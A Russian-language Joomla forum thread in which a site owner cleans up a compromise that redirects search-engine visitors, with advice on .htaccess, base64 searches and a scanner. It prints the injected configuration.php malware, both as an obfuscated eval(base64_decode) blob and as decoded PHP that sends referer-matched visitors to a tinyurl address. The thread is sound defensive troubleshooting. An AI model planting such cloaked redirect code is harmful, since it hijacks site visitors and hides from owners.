Через поисковики при входе на сайт открывается другая ссылка - Безопасность сайтов на Joomla

В поисковиках при попытке зайти на сайт происходит реддирект на другой адрес. По прямой ссылке через браузер все впорядке, в чем может быть дело? До этого были вирусы на сайте, их удалил, возможно не все, но Яндекс показывает, что все чисто.

[Перенесено в  раздел безопасность. Support Team]

Яндекс наверно не успел занести в список черный

Яндекс наверно не успел занести в список черный

Яндекс уже заносил, потом я почистил сайт, выгрузил снова, проверка Яндекса показала что все в порядке, убрали сайт из черного списка, а реддирект остался

.htaccess проверенный ?

.htaccess проверенный ?

Честно говоря я в нем не разбираюсь, но заменил его на первоначальную копию

Ну тогда поиск закодированного,base64, base64_decode и сканер fls.php в помощь

Интересно что в mail.ru поиске все в порядке

Интересно что в mail.ru поиске все в порядке

Заказчика не интересует трафик из майл.ру

Заказчика не интересует трафик из майл.ру

Согласен ))), сканер fls.php  результатов не дал (

или .htaccess или base64_decode или javascript редирект. Массовый дефейс файлов через шел wso. Как обычно. Ищите что редиректит.

Вроде бы все заработало, много мусора было в папках  images, cashe, media, либо php файлы левые или файлы без расширения. Плюс в корне сайта в файлах содержалось указанное вверху. Спасибо всем за ответы и помощь

В configuration.php нашел такое

Код

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90aW55dXJsLmNvbS9iNm9xY280Iik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));

а вот вам и сорец):

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://tinyurl.com/b6oqco4");
      exit();
   }
}
}

Интересно что в mail.ru поиске все в порядке

В сорце просто майл.ру не указан, видать забыли добавить)